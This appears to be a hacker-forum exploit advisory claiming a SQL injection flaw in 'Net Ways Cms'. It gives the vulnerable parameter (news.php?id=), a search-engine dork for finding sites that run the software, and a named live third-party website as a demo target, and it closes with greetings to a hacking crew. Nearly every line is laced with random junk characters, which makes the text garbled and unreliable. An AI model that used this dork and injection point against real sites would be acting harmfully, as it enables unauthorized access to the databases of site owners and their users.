################################################################################??######## 9 T7 L- P3 }% V
#
5 U" b; k ]( {; {# Exploit Title : Net Ways Cms Sql Injection Vulnerability $ \8 M$ a# k+ v9 ?2 n1 y
#
+ ]% p6 U) ]1 V' A0 V+ K9 \7 X9 I# Author : IrIsT.Ir
! ?8 |) J1 U9 E; R5 p: C$ u# W( }& \/ S5 j+ ?0 K7 n5 y
# Discovered By : Am!r # B% R. w& X) T. r' ]! |; z8 e. C
# 4 ~' s' H$ K- h4 J9 m# ]
# Home : http://IrIsT.Ir/forum
& H; Y! {' q0 p#
; Z2 _# t( `' P1 d% w* `# Software Link : http://www.netways.com/ www.political-security.com
" W5 S& z# f& [7 v* s/ g# & F }; M5 y6 W* g, d+ ~
# Security Risk : High
7 y1 E9 V( g4 ~9 ]#
, B6 h, M0 n. }# Version : All Version % v( k& w3 O( l+ e
# 6 z7 z1 ^ u) k. A! J! C7 p
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
! w5 q, c( [* P( a3 I9 Q# 9 ]! P3 ~6 h5 C3 q* ]- A' S8 f
# Dork : intext:"Designed & developed by NetWays" . i. r, k( U$ g
#
. @) @2 Y6 {/ x! Y. d- D- ^8 r2 ?################################################################################??######## " I# o, w' a% ?3 F7 @( ^
# : ], n% B6 Y$ n
# Expl0iTs :
% I" i4 \6 l* d8 T, s! J W; S# - b2 |% o I7 {0 j- q" u
# http://target.com/news.php?id=[Sql]
$ i' [( \1 v! R" B1 ^8 w# & n; u0 s- n; U
#
% ~) D' y& x( e. ]$ c" N7 Q, P# D3mo : 4 U; k) E6 O: {# q2 n8 Q
#
: m' y/ m1 I+ O* b6 Y8 q# http://compagnieparento.com/news.php?id=7[Sql] 4 V! U7 k) H/ I! ^9 t
#
- N2 G' k: B$ B! D/ D5 [0 \################################################################################??######## : z0 j9 b/ X, ?* N4 Y$ m8 J
#
$ }$ t! M5 N5 s: W# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r w, E) |7 q( W% b: A. }- d
# 2 Q# t5 ~+ P4 K6 u2 Y9 l: e, K
# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r 1 D; x& J1 a6 s9 z" w
#
a, q2 W6 m$ r4 N I' @# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum . g( U6 Q9 |3 ?
#
' U! e9 d$ P' s( b& M################################################################################??######## |